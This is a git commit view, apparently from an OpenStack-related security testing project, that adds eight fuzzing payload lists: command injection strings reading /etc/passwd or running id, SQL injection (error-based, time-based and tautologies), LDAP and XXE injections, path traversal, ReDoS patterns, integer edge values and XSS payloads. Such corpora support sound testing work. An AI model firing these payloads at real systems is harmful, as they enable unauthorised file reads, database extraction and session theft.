Adding Payloads to new repo

Change-Id: I113954eced5c0675a5d462260cbf3875182b1c2f
This commit is contained in:
Vinay Potluri 2016-12-06 11:36:45 -06:00
parent 9011e09ae3
commit ca14b0db1b
8 changed files with 135 additions and 0 deletions

35
command_injection.txt Normal file
View File

@ -0,0 +1,35 @@
%3B%20cat%20/etc/passwd
%7C%20cat%20%2Fetc%2Fpasswd
%26%26%20id
%60id%60
%7C%7C%20sleep%2010
%26%26%20sleep%2010
%7C%20type%20C%3A%5Cboot.ini
%7C%7C%20type%20C%3A%5Cboot.ini
%26%26%20%20ping%20127.0.0.1%20-n%2010
%3B%20%20ping%20127.0.0.1%20-n%2010
&& id
`id`
| id
|| id
; id
| cat /etc/passwd
&& cat /etc/passwd
`cat /etc/passwd`
; cat /etc/passwd
|| cat /etc/passwd
&& sleep 10
|| sleep 10
| sleep 10
; sleep 10
`sleep 10`
| type C:\boot.ini
|| type C:\boot.ini
; type C:\boot.ini
&& type C:\boot.ini
`type C:\boot.ini`
| ping 127.0.0.1 -n 10
; ping 127.0.0.1 -n 10
|| ping 127.0.0.1 -n 10
&& ping 127.0.0.1 -n 10
`ping 127.0.0.1 -n 10`

17
integer-overflow.txt Normal file
View File

@ -0,0 +1,17 @@
-1
-0
-0xff
999999999999999
-999999999999999
-0.999999999999999
9 ** 100
\x00
0
0x3fffffff
0x7ffffffe
0x7fffffff
0x80000000
0xfffffffe
0xffffffff
0x10000
0x100000

25
ldap.txt Normal file
View File

@ -0,0 +1,25 @@
!
%21
%26
%28
%29
%2A%28%7C%28mail%3D%2A%29%29
%2A%28%7C%28objectclass%3D%2A%29%29
%2A%7C
%7C
&
(
)
*(|(mail=*))
*(|(objectclass=*))
*/*
*|
/
//
//*
@*
x' or name()='username' or 'x'='y
|
*()|&'
admin*
admin*)((|userpassword=*)

6
redos.txt Normal file
View File

@ -0,0 +1,6 @@
(a+)+
^(([a-z])+.)+[A-Z]([a-z])+$
aaaaaaaaaaaaaaaaaaaaaaaaaab
(([\-.]|[_]+)?([a-zA-Z0-9]+))*
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
1111111111111111111111111111111112

30
sql-injection.txt Normal file
View File

@ -0,0 +1,30 @@
AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
AND EXTRACTVALUE(1,CONCAT('','x',(SELECT (ELT(1=1,1))),'x'))
AND UPDATEXML(1,CONCAT('.','x',(SELECT (ELT(1=1,1))),'x'),2)
AND ROW(1,2)>(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM (SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6)a GROUP BY x)
AND 1=CAST('x'||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'x' AS NUMERIC)
PROCEDURE ANALYSE(EXTRACTVALUE(1,CONCAT('','x',(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END)),'x')),1)
(SELECT 1 FROM(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
(EXTRACTVALUE(1,CONCAT('','x',(SELECT (ELT(1=1,1))),'x')))
(CAST('x'||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'x' AS NUMERIC))
,(SELECT 1 FROM(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
,ROW(1,2)>(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM (SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6)a GROUP BY x)
,(CAST('x'||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'x' AS NUMERIC))
AND (SELECT * FROM (SELECT(SLEEP(10)))x)
AND SLEEP(10)
RLIKE (SELECT * FROM (SELECT(SLEEP(10)))x)
AND ELT(1=1,SLEEP(10))
AND 1=(SELECT 1 FROM PG_SLEEP(10))
(SELECT (CASE WHEN (1=1) THEN SLEEP(10) ELSE 1*(SELECT 1 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
(SELECT * FROM (SELECT(SLEEP(10)))x)
(SELECT 1 FROM PG_SLEEP(10))
,(SELECT (CASE WHEN (1=1) THEN SLEEP(10) ELSE 1*(SELECT 1 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
,(SELECT (CASE WHEN (1=1) THEN (SELECT 1 FROM PG_SLEEP(10)) ELSE 1/(SELECT 0) END))
a'b"c'd"
' or 'a'='a
" or "a"="a
') or ('a'='a
'/**/OR/**/1/**/=/**/1
' or 1=1 --
' union (select @@version) --
; OR '1'='1'

12
string_validation.txt Normal file
View File

@ -0,0 +1,12 @@
\x00
\\00
\x80\xff
%uf%80%ff%xx%uffff
\u1111\uffff
\u2018
\u201c
%2e%2e%2f
..%c0%af
%5c
..%255c..%255c..%255c
*!@#$^&()[]{}|.,"\'/''"

4
xml-external.txt Normal file
View File

@ -0,0 +1,4 @@
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "http://www.openstack.org" >]>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "http://www.openstackorg" >]>

6
xss.txt Normal file
View File

@ -0,0 +1,6 @@
<script>alert(document.cookie);</script>
'';!--"<XSS>=&{()}
<IMG SRC=javascript:alert('XSS')>
</script><script>alert('XSS');</script>
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<STYLE>@import'http://xss.rocks/xss.css';</STYLE>